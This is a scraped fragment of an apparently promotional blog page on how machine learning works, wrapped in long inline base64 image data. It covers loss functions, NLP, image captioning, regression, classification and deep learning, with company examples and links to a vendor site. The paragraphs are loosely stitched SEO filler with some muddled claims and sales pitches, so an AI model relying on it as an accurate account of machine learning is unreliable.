6ls7UlK0qUl3ycZXj1XUK80qB9orJLXltauOn3CpHJUdaHk\/URn\/QmqAeREXalJJC18uJB9gxWnvU6cvh2Ok02v7SliS5bM0q7g7MtbcXybYb1frtKkQ+RS4YzCkOJHyT6xz3\/AFjyNSu2aHtlxcjNNS2nVSihKUvWttAClY7EpX9NbJ+o\/Za2bjaalR2rbCauzLavQpfh4U2T3wSBkpOO4x7awktWjbjojVtmtmroLsRtD6ELcWkhPLyQeXlx5Ad\/cfZWDG\/rLZvc2stLtKi4oxx+p0YXTY9M9YwbQQB8ptx1B+zBqYxuju9Xhtb1ssaHUpVxKm5DoAV54yQB5GstNu9AwpiRNvklbUdSuLMdgFTzp9\/l6ifpP\/8AtX5tlgSqK1HbjNworCSG2R3IHvP01W7+uksP+DB+y7dvLX8mtFzo53DjZRFs76ifYmYgn3fzlA1IpfR\/uqzIDzelr04vlngwyqQP\/wAtKq2kSLc0wsJCeQHnyTXCD4Md3k2kc8+fuqftWvHmslmWk275NmtHbvbDczQG4MGVfNstYPJeD0cvs2aS9xQ4CMqCG8juc4IHbNK2lPOqX3CvYkgj2HNKzI6nJrdf2Y70qC5MyOHlUa4JWMVHl9FbY0RypXHl9FOX0UBS249qiXTTvhzhJDLchpS1R8+IBy45GP8Axfq9\/bNWxl6Vn6CVH1lbLbcpPoJyWGXI5e4DILBSDgs4JISXVFsgcE4HGr4zWG5kR2I8DweQUKx54Ix2+mpMbbLn6cVaZ7LankoLQU4AUuEdgo9j5jv5Hz8qAksLU8a8NwPRFpfhPhMtDiVdlo7KRn6yjtRxMiFqSdHcY8eHIYDiG1qJDjK\/+KkDyylXf9Sz7sVDTGg5tkjx2pE0LLK5CUpCioJbceLgAUQM45EeQ7Y93eqLnZ2pzkea2pLU2HyLDxTkDI7pUAQSk9iRnzAPsoCnWYUvS1puLCnnJsIoemsSn+K3ElSitaF57Hz9U+4YOMAmlun22Rlw79qtmE0yq8zeykJ9YoRywknA5Y5YzjzBq5seKt+2+hTG0oPAtr4HI+rPs+g+VdiBBh2yMmJBjNstJ7hDaeIBPn2oDs1GuPL6KcvooDlSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBUCcVGlAdadFRNjOxXCQl1BQSPMZ9tY+a8sWsNLSVvLYcct4Vy9JYBKSPZn+ifLOe301kXj6a+bjDbqFIdSFJWCFJUMgj6RWLc2sblYfMy7S8naSyt14GMMG9M3JoNSQhZPtIAroXjQWmb9\/3+1sSFHPrKSCQPoNXU13sxHeS5eNHIEaQPWXEHyHB\/y\/0T9HlVvIzrsQFp1RQ6n1VJV7CPMGtBXtalF\/GdLbXkLnenz8CSIsUfT0NUW2NeitnuAhPqg+6qjtExaoJDi\/WR2zmpFMvaVSCw6Avl7Aa+iHVMNqDKVBJGQTWKqiTwZdWD4cnbuE3HJ1xzufV+iqfXcC24nDgHrV1rlPfKeKM5HfHnUnbky3lKStriQcA48qplJFqEMlxbTPEmI4gr5OeeaVJdNlxtwcl9lpHbypV2nL4SqUdzLZNRqCQfdXLB91dgcOQpSmR76AEA9jUah9FKAY7Ae6lPppke+gHlSmR76UApUQCfLvUKA+ifKuVfMkhBI93lVBOat1ZZm3\/H09LuDX51ehsvrwhZQp1fhkNpQCW0pASFdyrscnPIgXBpVIQb1rS4zobTuml25lKkmY4882oKBC8pRxJJxhByQO5wM4Jqrk5x3oCNKVA+VASXVWp4elYLdwmIcWh1wtIS2BlS+ClJT39qiniPpUKlUvdPSMNpp1dwUoLcS2rjHcIRySCFZCe6TnsodlHsCSCKl7029an1BNiQr4bZCtiloUpMdl3ktJ45V4qTgk8x2IxwPnnt9k6VvaRhjcEJAyQlNrh\/zvPyb9vbNAVTYL3F1DbGrtB5Fh5SwgqSUkhKynOD3GcZwamNUJ6bqnT+orPbJN5RdIlzcW0oKiNtKRxbUrkkt4HYhPYj2mq6AwAKAjUM5ri7nw1cSM47Z8s1ay867i6F42vVm5ml7NMeQ26r863RCXU4+WtKFlOUrOcDyTg4z5AC61Ks7pbenTmtblbtPWzd3Qci6yVNO+hWu4tvSFccKcaSkOKB9UK7j\/4Zq8IoCNKUoBSrD9VW6OodB2K26f006uHM1Gt1gT\/khhCeIPFzPqK9cdyPLJBBTVMba6H3a0ZctH6m1Drm73L89XFcCbaHHVLLKFNuK58lkpUlIa5EgD1T6pye4GT9K4pzjvXKgFKUoBSlKAUqB8q6CrvDbuibOpa\/SHGvGSCDgpyR2Pt8u\/uyM45DIEwrqzblBtzZenzWIzQ81vOBCR9ZOK68a9QZ7Ep2I4paYji2XfUUnC0D1gM4z+sdqo22taajaeO5WvpENTjzJuC5c9SS1BjkckNtBXZASjGcd1KyTkmgK5hz4NxaD8CYxJaIyHGXAtJ\/UQSKt\/uhtknUMJ26WJIZuSPWWlAwH0+0Y\/pe4+2u3eodlj2lrcbRZjtLbbRMLsMhLM+KcFSVhPZYKDySr5SVBJBxyBrxBDiAsAkKAP2irdSnGrHhkXKVWVGSlB4MHrlbr9bXypSyFNkg5T5H3H3eVTO3ahmNsejykBz38RWRO4u1beoy5dLKUMT8ZW2eyHj7\/oV9Pkfb76x1vtul2eUuDcITsSSgkFDg4+X\/AF+qububCVCWVyOptdSVxHhb3O+zIjSV+GpoJGMAEfTXakW1kJyhsdgD2qi1SXm18mVqBHsPYU\/hrcI54SUck+WSe+K19SSjzNjCHHuirI05qK+EHuodsUqmoepYE95JUChRPdQ99Kx1VxsZKoIzlAGKjge6g8qjXoB5wW53pibnv2q2q2pkpauK5hjy1LKeDUZba8vBKuyloWlvA\/5lVbm3K6iVzXXZsm8NSJUaLMYiKZjqhxnXpCHHmS6E8leChamu57pQSM5NZDSX2IyPEkuobRkJ5LUAMk4A7+3NfBVytzbqGXJ0ZK3DxbQXEhSj37AZ7nsfsoCwVgT1Dyr1IMqTeY9mdFoZ5XBuKZgSZT\/pa0eEPDQtLZb5HipJATwJFVlLt26LOzby7VqW7P6sVa3\/AA\/SGWPG9LcI4Hs2Ejw++BxwQe\/LtVxHNQWJplMp68QW2VciHFSUJQrj54OcHHt91fZu7Wp3kGrjFWUkpPF1JwoJCsef9FSVfqIPtoCwV0HUJb5mrbJbrjfbjJeEKBp+UWIoioQtiN6TL8Tgn10K9LKQ52KkpGMEVOXZu8iIjmqobWonnjFtLj1iW3EHFalLTNQyVJTlaSlB7uEcSrB7pq8yp0Ep5qlM8OXAqKxgK5cSP8XbHv7Ufn2+OpSH5kdpTSUrcC3QkpSTgEjPkT2GfbQGOryOpaEhxq43i9ONrl29Jct8OI6tDSWXUyVIBRnBcS0ruD2cynGFCp3vnozcTS8qXvxtTq67qutmhhy4ablyFO226RGRlaAyf+G7xBIUnvn3ZOb2oudrckmEi4RVPjGWg6krGe49XOfYfsrHDe\/qmd0BuDftBQYMObGtumS54XrKlzLzJUUQ4bKE55ZGFK7HsT7gCBfvb7Wds3C0VZdb2cKEO9QmpjSVEFSQtIJSce0HIP6qnpSfOqA6e9DT9uNldIaKu4InWy2NNyUk\/IcI5KT9ROPqq4lAfM9kjuBWJ25m5e7+sr1PtmntTRdL6Ui63tmmkzLc0pVxkIeKcvtPqJbCPE5JICT8kjPmKyD3M0\/rLUVkEDR+rhp9fIqkPpiIfccbx8hIWCkZ757ZPbBHtw607YLjpezaqEzUk6QqHuJpiUbY6yhtuPynBPpJCUpCXnwCtaAPVynkVL5GgL8Tn95NotUaMYve7CdY2LUV+Ysj7FwsrDEpkOocKVpeY4g4KR8pJzmr\/VYfeu2SNL6c2siSLxOvDtu19YWnJ85SVPv83yjkspABPrYyBV+ASe\/soCNQPlUalV8vjdpZShtr0iY+FCPGSfWdIHc9skJGRlWO2faSAQKK27cg3RF5dfkJ8SfLCwgLwvGS6CAO+MuH7Km0bTtycSXBEQwQ8XUoU8E\/yuB65ASrkCR5E49uAas9eGpMNRQu0uRWlLDmZEJxDPrHsVHuTjA9QEkAnucZVBm8JjodTBf8BwJIQPHeZcAPZKiG1qWlJKh54wEOHv2wBdya0ka+01bS5kwoUmQoD+cSgt5\/1NVyDkZq2m3kJ+XqCTdZMidIXCiiItcl5SyHVFK8DkSpJCeOUk9s5HZeauZQECMjFYs7YaT0nq\/qf3dY1lpe0XtTMOzvxPzhCbkFjK5aV8OYPHOEZx\/RHurKVRISSnzrEdG42k9keqTXN53BmyLdbNQWaM3CkJiOupfdbkuqUhPBJyUhwZHsyPfQFN76dRfTpt\/qdmw2PaVqTqjRN\/ZkANQUwGULazyU28yoEqGQUhSFJPtFZR7O7xaQ3t0gzrHRrkv0Zayy8zKYU04w8n5Tas9lEf0kkpPsNY1bkah6Wd25Ua36a2nn6kv2or3CTMmQLE9CkcFOguOuTFtdkAD1xyBKc9x51lnpPR9h0bbGLTYIaY8WO0lpptPZKEJHqpQnySkd\/VAA7k+ZJIE9pSlAWE6wXtNr0DbLTfZTUZ6ddmhHeUlSi0lIPiOYQCopCTg4BOFdgT2NQbPanm6yiWlqfGt0ZzT0MIUiHJ8dD6VJ8Np9tQSEhCkocwArkD2IByKsP1tXibO3Cs9hXhEa02kzGsrAK1vulKiPf\/wUdvPsqvh0z62RZNa6bcUt1pGpDK0\/cfEe5JefjttOx3gP5pw+lnHvGc5UcTgGbI7Co1AHNRqAKVAnArrMXKFKienxpbDsbiVB5DgU2QM5PIdsDHegO1SvlGkx5jCJUV9t5l1IW242oKStJ7ggjsQffUJUhMWO7JWklLSCtQAycAZ7UB1b7cDa7HcLohIUqJFdfCT7SlJOP9KoRL93cjOanuEG8quDbiLeWI+EDjz7uJSE545JOSc8R9GKmjuo2L\/dndNNulca6QlFJ4cShtSFDlkn1s98YyD3PsNUpcZdxs0ItXm73h6Ow40mW\/DVzZbUpRDmXCtPZJ7klHqjHYnOAKp0M9ORcrxpyWW\/RojUZ1hHhgLSHUq5BwgAKV6oOcZ7nNdCOm36fMeya50+iTGtPL803QxDIZUyewSrikll1IwkgjiocSlRJUlBUy4afn3DVS\/Q3G72uMzFKXPESltCFq5qKcAlXZKRnHkc+yq6ts9u5RUvJxyBKHMAgBY7Kxnv50BbhuyxLzdpFt0MxNiWS5pCrspTamYKcLBJjtqSD4ywClRRhvBUpRKwkKumhISkJHsGKBIBzXKgIEZqV3zTNj1HFVDvdrjTGiCMOtglP0pPmk\/SCDU1pVLipLDJTcXlFg9bdO7caO\/P0dMcIQkr9DfPJRGDkIX559wV9tWMdsrbnJqR6riVFCkn2EVnYryrHrezREe234XyCyG2pwLiwPY4PlfqznP1mtHqdiuD2kDe6VqElP2UyzcCwMsOYSxnByFewfbSqgCmI6RyQpOfMClc7wrqdRxvoZljyqNQHlUa9APOShd1NvpevmLIIUy2NO2a5eneDdLf6bFkAx3mSlbXNHrJ8bmlWeykDt7rcL6ZrhJkQnbpq6HLRZ5ZdtyfzcUcWUulxpLuXFclgLcQpaeGexABBByBpQGLb3R5cmrNBtVu1TaeTFon251+Ra1KUHZUSIyp9sBY4qSqKVAHuQ5gqyMmqtLdMcbS91IRdLZdbGt+WkQbtavSXI8R1hppLLDinP5MhLXBSilRU3xT245N+qUBbSftO+7txB0nbbhFj3mAzES3c32VvJUtqU1IXzTzClBxbXretnKicmqN1xsLrnWt6umoZOq7E1JvMSLa5DC7a47FTEYUy+ghPiBSlektOHiVABDyhkkAm\/tKAsDpfp71foy4C5WbVVgfksS7dKZkSbQ4FuCPA9EUhwIdBwr5YwexAGFeddbcLpKg33cJ3eXbvWcvTOuFO+OmTJit3CGpzgE58FzujsAMpUMe6sh6UBL7Czdo1nhRr7OZmXFqO2mXIZZ8Jt54JHNaUZPEE5IGTj31MKUoDisZSasFuh0qWLXN2m6ntl8uUG6z5TMpZRNU02HGnPEQviEqQpSV4KebawBlPbIIv\/SgLA2rp\/07ataabvG4esNR6vvwmGVbVXGYt5ll9lPi8uBPhjGMgpbR3x291\/UgAdqo7Xwctsmy6vLLrsewy1uzA0grWiM40ptxwJGVK4ckrIAzhJwCe1VZElxpkduVFkNvMupC23G1BSVpPkQR2I+kUAlymIcdyTJfbZZaQXHHHFBKUJHcqJPYAD2mrQz9RaruuqZ930A4LiwGmgB4KS4hojthp4tEtqUlSkuoUUqyod8A1dLUCLK5aZP8IER1W9DZckekY8MIT6xKs9sDAJzVJbZaeSuCnWt0txYut1fny2QrKXGYcl9LjTSx7FeE2xyB+SoKAx3oCi7vqTXbktE686aubTjDPhhTUKUlPmSSA0l1KSe2SFDPEeeKDcrSjjbNsVo2M5ckoQ1EEllSnlvDABPNlKlKzxPbuSPZ2q+dcSkH2UBIdFtQYtoNsjymX5MFwtTwhwLU3JUlLi0rx5KIcSrBx2Un2YqoKoFS4+hNd3CfPWWLPqwsPLkrOG2bk22ljC1eSQ602wlOe3JojzWkGu0uIUgKScgjOR3oCjNydUak05a3pljhJTHhw37jOuDrfitsMtAEoS2FJK3VZyBkAJSok54g\/W1aRZuiHZ2p4DTNzU6Q+9bZj7LMrAADoQlY48gB6pKiMY5KwCfjuTNjXe0PaBhOpfuOoW1QlMIPJTUZY4vvLx8hCUEjkexUpCR3UAa1SAkcQMUBJI+idMR3m5P5rQ86yoLbXJcW+pCgcgpLhOCD5EVPAAKjSgFKUoDEPrYtcePq\/Sd6fSgNXGBLtzrihkNlCkKQo\/QkvlX0gEe2rVRvR7Xpi26wsURYXZrimU6to+tFmnn4icDGQAxEX7vXx7Kvn1uWm6XW26VVbrc9IaiuzHJLqU\/ybCD4CQpxZ9VCcqAyogVjonb3caBFbhW2y3RZuam0PQ\/D\/wCItDikgKwcKAcSe3bBKc+YzOAZxaR3+2o1ZGjKia3tMaZIQnMOXIDDqVnsU8XMZOfdnPmPOriIcS4kKSoEHyIPY1rUu2jdypLjce7aYvEdnmhJcVAcWE9sc1BCFLPb2JHl2wavBH3G\/grp5bdn9Ohzmn35bSmI90QQXHlLShQcaDfFIIQAUYOB9OYBlBuvqKZpfb693W2JK7h6KpiCgeapLnqNAfTyUmu3pPSkbTWibbpApQ43DgIiu5GQ4rj66j+tXI\/XWPEjqe0Vrado633+QLbGhzG7peJAYecZ8RltRQ0gcORy8UKzg44edXcZ6ltkX2\/Ea12ypIGSfQ5IA\/XlvtQHd2MluK0AxZZCyZGn5UmzvBSsqHgOqSjP0lvwz9dXAIB8xWNVp6h9ttGbhat9Guq7lZL6uNdY70Rs8W5Jb8J9CufH1j4bavdgiq0tPVVtDc46XV3pcFxR4hqX4bSvPHcqXxA+kkUBXdx0Rp1EZ+VbbJHjzBzebcioSy6XD3OFDHmcZB7E4NU+bDa7jbXr2xfoUeOSXPGdilCmeJVyQ4FLCkqTkoIOCkggjORXRhdR22N4mtWuy3lubMdfXHLKVpTxKRnkFZ4rSfYpBUDVvdYSbJebpebkh+FHEjw22S+hYLr\/ACcSoAcASTzbAUfLgKAu1pTTlrvTa7zJjOLhl5xNvhu9mG2PIKS3jHrHJ9vs+qt40WNFZSxGYbabQMJShIAH1CuFucLsFh5UVUYuNpWWVAAtkgHice0eVdmgFKUoBSlKAhge6qb19pxGpdOyoARl9KC4wR5hYHb7e4+uqlritPIeWaonBTi4vqVQm6clNdDCqWuRFeVAfHq5I7jvnNKuVvBpJi239yU2yUolZdQR7CT632H\/AK0ri69L2dRwfQ7i3ryqU1OnjD8SqB1mdJg\/+sht1+0UX9+nwzekz9I\/br9oov79ebzNM125wp6Q\/hm9Jn6R+3X7RRf36fDN6TP0j9uv2ii\/v15vM0zQHpD+Gb0mfpH7dftFF\/fp8M3pM\/SP26\/aKL+\/Xm8zTNAekP4ZvSZ+kft1+0UX9+nwzekz9I\/br9oov79ebzNM0B6Q\/hm9Jn6R+3X7RRf36fDN6TP0j9uv2ii\/v15vM0zQHpD+Gb0mfpH7dftFF\/fp8M3pM\/SP26\/aKL+\/Xm8zTNAekP4ZvSZ+kft1+0UX9+nwzekz9I\/br9oov79ebzNM0B6QT1ldJZyD1H7ckH\/2hi\/v1Tb3Uh0fNLU9p\/ql0ZYHFklf5u1PD8NRPcnwXStkEnzUEAn3154s0zQHoZR1HdIcpxC9SdV+kNQobUFtsT9SQEMJUDkEtRw0hwggEcwrBGRiqpT1l9JaQAOo\/bnA\/wDaKL+\/Xm9zTNAekP4ZvSZ+kft1+0UX9+nwzekz9I\/br9oov79ebzNM0B6PpPWH0iy2XI8nqK22dadQULbXqCKpK0kYIIK+4qRJ6jOiJsFLXUBt8ygnJaZ1Y200f\/LQ6E4+qvO9mmaA9Glr6sOjayoU3at\/9sYqXMc\/Cv0RJVjyyQvv7a7\/AMM3pM\/SP26\/aKL+\/Xm8zTNAekP4ZvSZ+kft1+0UX9+nwzekz9I\/br9oov79ebzNM0B6Q\/hm9Jn6R+3X7RRf36fDN6TP0j9uv2ii\/v15vM0zQHpAc6x+kh0FLnUbtwpKgQpKtQxSCPcRzqC+sXpHcSUL6jduClQKSDqGL3H+OvOBmmaA9Eg6juhbsDvJtGoJ8uV2hH\/qqvnJ6juiV1rwoe\/O1cE4ICmLlbSR\/jCh\/pXnfzTNAegde9\/RtI5Cb1YaPfSrPqpvtqYx9y0g103ty+gSThUrqG0i6sYyr+HikEn9SHwP9K0CZpmgN9krWf5P+T3T1IaZYV55Rr3l\/ot5QqNp110EW2a3Kk9RmgLq2jIMe4Xe0PIWMdsr8IOfTnnn35HatCWaZoD0GneL8nkXQ8Ny9mkuJIKVIukJKgR5EEK7VUDfVD0UsuNutb6bVpcaWFoUL1DBSoHIIPLsR7686WaZoD0hJ6y+kxIx8JDbr9oov79R+Gb0mfpH7dftFF\/frzeZpmgPSH8M3pM\/SP26\/aKL+\/T4ZvSZ+kft1+0UX9+vN5mmaA9Ifwzekz9I\/br9oov79Phm9Jn6R+3X7RRf3683maZoD0h\/DN6TP0j9uv2ii\/v0PWZ0m47dR+3X7RRf3683maZNAegTdrqo6W75bIjtu6gtASXmnVJKWr\/GUQFJ8+y\/LKRSvP3k0rXXGmUrmp7STaZsbbUqltTVOKyKUpWxNcKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUB\/\/2Q==\" width=\"303px\" alt=\"how machine learning works\" \/><\/p>\n<p><p>Suppose you are looking to start harnessing the power of AI to boost your help desk capabilities. In that case, we encourage you to try it as it seamlessly integrates into your IT infrastructure, improving first response times and data accuracy for better routing and reporting. For instance, some models are more suited to dealing with texts, while they may better equip others to handle images. These categories come from the learning received or feedback given to the system developed. The y-axis is the loss value, which depends on the difference between the label and the prediction, and thus the network parameters \u2014 in this case, the one weight w. In this particular example, the number of rows of the weight matrix corresponds to the size of the input layer, which is two, and the number of columns to the size of the output layer, which is three.<\/p>\n<\/p>\n<p><h2>Uses of Machine Learning<\/h2>\n<\/p>\n<p><p>Two models are used for image captioning, both as important as the other. The image-based model will start by extracting features from the image, while the language-based model will translate those features into a logical sentence. Natural Language Processing (NLP) uses machine learning to reveal the structure and meaning of text. It analyzes text to understand the sentiment and extract key information. For example, if a model is given pictures of both dogs and cats, it isn\u2019t already trained to know the features that differentiate both.<\/p>\n<\/p>\n<div style='border: grey dotted 1px;padding: 14px'>\n<h3>Google Photos Is Getting On-Demand Cinematic Photo Effects: What It Is And How It Works &#8211; News18<\/h3>\n<p>Google Photos Is Getting On-Demand Cinematic Photo Effects: What It Is And How It Works.<\/p>\n<p>Posted: Sat, 10 Jun 2023 06:49:18 GMT [<a href='https:\/\/news.google.com\/rss\/articles\/CBMibmh0dHBzOi8vd3d3Lm5ld3MxOC5jb20vdGVjaC9nb29nbGUtcGhvdG9zLWlzLWdldHRpbmctb24tZGVtYW5kLWNpbmVtYXRpYy1waG90by1lZmZlY3RzLXdoYXQtaXQtaXMtODA0NTEzNy5odG1s0gFyaHR0cHM6Ly93d3cubmV3czE4LmNvbS9hbXAvdGVjaC9nb29nbGUtcGhvdG9zLWlzLWdldHRpbmctb24tZGVtYW5kLWNpbmVtYXRpYy1waG90by1lZmZlY3RzLXdoYXQtaXQtaXMtODA0NTEzNy5odG1s?oc=5' rel=\"nofollow\">source<\/a>]<\/p>\n<\/div>\n<p><p>For example, UberEats uses machine learning to estimate optimum times for drivers to pick up food orders, while Spotify leverages machine learning to offer personalized content and personalized marketing. And Dell uses machine learning text analysis to save hundreds of hours analyzing thousands of employee surveys to listen to the voice of employee (VoE) and improve employee satisfaction. This model is used to predict quantities, such as the probability an event will happen, meaning the output may have any number value within a certain range. Predicting the value of a property in a specific neighborhood or the spread of COVID19 in a particular region are examples of regression problems. There are a number of classification algorithms <a href=\"https:\/\/www.metadialog.com\/blog\/how-does-ml-work\/\">used in<\/a> supervised learning, with Support Vector Machines (SVM) and Naive Bayes among the most common. Once the input variables have been multiplied by their respective weight, the Bias will be added to it.<\/p>\n<\/p>\n<p><h2>Entertainment Machine Learning Examples<\/h2>\n<\/p>\n<p><p>In this example, a domain expert would need to spend considerable time engineering a conventional machine learning system to detect the features that represent a cat. With deep learning, all that is needed is to supply the system with a very large number of cat images, and the system can autonomously learn the features that represent a cat. Deep learning networks learn by discovering intricate structures in the data they experience. By building computational models that are composed of multiple processing layers, the networks can create multiple levels of abstraction to represent the data. The accuracy, heterogeneity, linearity, and redundancy of the data should also be analyzed before selecting a supervised learning algorithm.<\/p>\n<\/p>\n<p><a href=\"https:\/\/metadialog.com\/\"><img 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xq1CHp7WJvaPSNMvoYEBfEJVS5CoBOke5oIssamO0E4olPLzSV1oMKbIWKhiArDUpcypMqoDbEMKUnw+Ir8KrhnFRu9ZX2ZmBZdREMndoFGpQAbC0iILT5m7sW2gLj3gWkAEcz+kiRjecETC0qdQVMLROE8c0MVB8RXceYmRJO3MgATNsWvhd1WTOmNyCRsAbWv5f1NHyuTaoinSQDABBugZSQGAjweIm4Im+5vN5PJCnLiozXM+IGT4SBYEATaQBYja2I8Dp8TsyKpaezE90u0ATkkdRjx6LlwKVTHP3Wg5Oph9mgIv9+IfhlcEhZltMzMi1jeZP5eWOuPmVicfULd7a0EevglXksaVU89w2TMi5Mjpf78L5LLBDIJ+e+HZygi0\/jhBqZxsurkjTOFjUrNjXaiMqwZTPWjHlWoDiFok4crOEiwArTa\/CmqOHeWq4iMoxw+og4oe1XNKlVXCXEapVGKiSBPTHtMxucKVVkflhYN7wVrstICj+FcS1pq2Ox9fLDqhYbz63xUcxk6qqSfdJJIB5zvGHnCc6UXxzPIHkMaL7UQSwznZZVG9dIZUBGNyrDmsiGgzcXBsfxw4Z4BJ2HPFez\/aAaDp32np54hDxipBBaxxxllUqDPxXavEqNImMk9FPZjNpUJXcnaenMjphtU7LqSIaF+1NzPKLRjzgma1XIEjnbFgo18SqvfROlmFyjSp3DddTPwUPleytOPEST1BgeVo3wrl8j3IgsIJIFoPUSZjYYln2xQ+3HtEytGm4ZzVmmx00CSSpJQ6aikBSDuQwZdxeJVfc1CO8fdNC2o08gAffxTGt7VclT7wAuxpmNAQhn3J0BiohQpJ1adueM67S+0qpXLVVoKr5ZiaL95pamz+Dx0yzCo2hyFhDDPqj3cZL2z4iNX8OkKZdSzgF6joHA1KajNBW5nwgjUNRJLAQVXOhSpTUSDKljI020yoldQ+0Je4VSPCdWc+rVJyR6fzO3ouTIhW7jfaSrIDBRTDamBBqCo5YAO\/eTT8OkhU0hU0aSoKuMOuCdtcx3pFLM1BRYnXUIJanQJVe9qAuy0mVaUkoZimwldYcUzjGogOSXNQlmkCz6vF4RHvG\/iAPigbA4e9nOIJq\/i0lrmQRrdwNHgUhQChRlApnUG8KI8LBbFNPVrEnn9PBdgKz5jj2aqV3o0atfMN3pFCsr1aTlC6s1RiVAKmGgK9JUZWB8Mrimdp89W75lr1BWq0wtNXFQ1KKopNqLaVVxIADQokOGBbUcSucKJUZ6bGC1SCKr62QMNVMnulXukqB1A0iQizYiY3tBnA1TVRpwqk6XJc1BTUjSGZ2aVRQIgBgZ2EAMVHBre8c+f38V1pzhSOVZBvMmSTZiztYlqkgu19Rg\/ZF99RxfjBphgCWsAHpypTSgUBgAQCIAgROne5GK9nqAU6pJmPD0O2qDcDza2Hr5gGlUUwSYYXFmW3PQxmBYauVjbHmXWoc4VHS4E7HHP3x8U3qMQoPNtsT4SxmZOozudMk3M3aBhs6PbQWY2AECZ3+H5WxZKHBdVNbqWLBtQv7wAZeZ8A0mFgGBhpR4c4LAowprUNFm8JIYEyLNpZrTCk7DlGPR2VRtRnc3kg9BCpgM3VR7S01YrZ1dd1YqQVkmRCrO3nzxYfZz2dfMVqdNSFXxB2MwFgQIBUmSQLG2\/LEX2s4cV7togFmS+8qEJEciNUYt3siqsrVWUsCtOQF693VIbnGkqPI6jPLDdZ4YyTt\/KctGGpgbwfkVoWb9kcVFNKvpBJJkQRcQF96YBN23P8ALIxS+McEfvGVYqLLKHA0qxFrQzhhqm5IOxISYxYszn6rUQxqu0x\/N7tzMj3YsCIhpBvpEQSVCpgEmwNyfeB2Hw\/PHHutq41W4yCRv0WJRfWZLaxn0TCpTTQ48YrBhpUgQVgg3uIBHLnHW0egK\/ai5kC2\/WZn7ptiYzGTZ22J5k\/15crzhpX4Y0hW0ifEdYIhZ5kMvKfPzxBlrSbJOScwTt6dFeKmrAwtb9tFJyct7ood4VquwBEuUXu38SladWmayFhMO1LaAcK+zXLPQo6Vpl8uCe7rUwFNWmFH8ZqJ0uGaLsgPenxBfEJvPFuCrW0ip4qYOpqZErUYEFdfVVI1aYgtpJ92DDdnc3V+qqKaq9SmWofxHZQTRdqRJYIxk6JiOe+PUOZFQv8A5+\/mvNNqzQFOOflvPx+C47WcYVMrWrBgQtGqVM7uEaFH9qRtuIMixx8p9kssWfSCQGGkkHpBmNicbF7V+HZqtSzFesEorRQKtNbsy1dCnU6gakAdlOosshlGzE5p7NKiB27whRBaTsDBEfeb+XzxuJ1nVQZbAjHj4wvR8Bt6bARMyc+3X1VhdzlnujadT6XiFfS7JaNtLBiUM3ABEb2ip2sEU6wJSouzi4Oo+JNJAYSSYWY01DG0hTjnEu+y7Ul0VQrNVAILMdba5otYloJBDWA1ATbEc2Ry70WpqxLHxAmZUzMK1wZBMhgTEEaSL+BvfyorNqMLgQckAy0j9+R2jyWqGu7zSBGcdQrzwPtO71A5AtCgmoqK6tsrSvggCTYbTMwcWvhPaelUbR7rk6Sp0kTyuGIIc6gsTOkzEicT4AzUlhWaZYIYI3kEKbLIZRIMbKZFsc5XMiQuplK2U1DqETLEPdQxINxYS3QYc4TxqtZPf3i5pMmZM9TnOfvZZ19w6lXAkQQIEY8lf\/a32TpDKVquuoDRRmpDXKKdIQUlBBhXYKu8ibY+d+z9IaiCLGAT0Mj9\/HGp9s83UbLCjp00yF1kGpU1HVqDQ0qhDKSQulS0m0wa9wTsezVqaUg1Rajr4tGmJFwfE4GkaiWJiwOPTf5OhcOHZ4n4nw+XyXLCg6g09o6fPotc9iPExUoFYVSsLpXVDQo1PNgXZtRYrcSg5Amu9qux1OnWRKAqSCWZ2JcyfF3eqGLMFKkF1YQ3jYnfUct2ZDEd5Rp3l2KW\/iXGtXTQ4qbQwgiSQRGO+JZOvTpkKVzA0370inVIvJ1ohpuQNgadMmLvJnGvQa6pSiq2InMZjf8AjErEuCKVbVTeDqyeQ98j3hY7mKxy79zUFNkY61amq02qppUHWpeUPiDi1xEMRcWbsnxKjTAKPq2PdVBLGpLgihVAPuabB1My3iQGRXe33GGqCkzxqB0hh4G7veCAoSdRUqfeXSY958QOVziPpswYLAtIuIMhgZsWgwfEoMCQV8m2\/ZbVjXoNGg5OO90+9wtR1satMNqb\/D79leu2\/DaVUD6utPvqjzVViVqS0AC5KhtZmV3ALKSsnFYynZ9FKsoWvU0QaDN3VWnXL0wrKY7uqhZo0MyErUMNKgh\/2CpBajU6zaadRSD0ACqyRA1qwgtIsSoBBknDngnDEOZQ1TFEMFpuwXTURZ7ttfgDagsGVYCDIvhoXdCqBXa1suMHoPH47n2VIpvp9ySY9fRVXJ5ZF1morUwoWVJ0ik7MyiEYvUcE9zLDWqCpLFRfDjgzK0q1wwEMD4jysSASOqwY3G04s\/tF7INlmNZCDTqliGQuGUMdUapZQDKqIgMJgCMVzs9wxXYd3qosWAGioFEeKSVYhNZDDQAUjyLYxuJ2oLnDLXbCTjwjpPqCtC3eHAFWHhNFqauFQjqCBcwsANMeKZEmfgYxK8KywpXqkKlVdQKnpNwRzAWLdRtAwrlM1VpjxkuBve3giQzQADqNIBTBIJ97HWUzYruSECIbOoOpSd9VpNxpHIeFb9fGvik2p2zSHRuDEeOfh81pNEkaT6QtB4JmywAMlrkny87\/AAESNsOK3CkL64OojSYNmER4hsbQPQAcsVnKVWVtX2TpEj3V5XE2J5ExsetrzTg3BkeWPoX4R4m67thbX0FwgsLiCXjw6luxOTnPNea4vaGhUNWjIB3jkf2Kh6eRZCvdxoBClLABCDLA7ztaIInDHi3ApJcQoW40QpCTqaDt4SA3I7x0xaNGOjT5ESDuPLzx6biHBbe8YGVBgGQOQMR7eCzrbiFSiZHr1PNVzs47QRMqxZWcD3vP3jcrIkgWnpeS4HwbSwNQqy6ie70grGmAdlvMEEgncb+LEmqACAAPQRznl+xfHmnGTwr8K06LIuTqIc4t3gBxBjOd8\/OU9c8Zc500hGBM9VM5HLUQSyi8zz8JgA6VsBMSTEzzsAOM8+q4xG5dRsfniSyuWHIg\/HG0LOlbiKYjyC7Rvn1z3o90nQXCz0uuFGpAcxhQZc4rd1T7SCmIy2JGjSthTL0TtGHv1Q4rc5WtamSjDqiuAZXrjru454gVKYTirl8d0ZGGj8QC2Jwsjc5xAsIElSbUaTAKTztMsOnX0xDZrKIt3JJ\/fLDzOZwiQDNjfpiv1WJ5z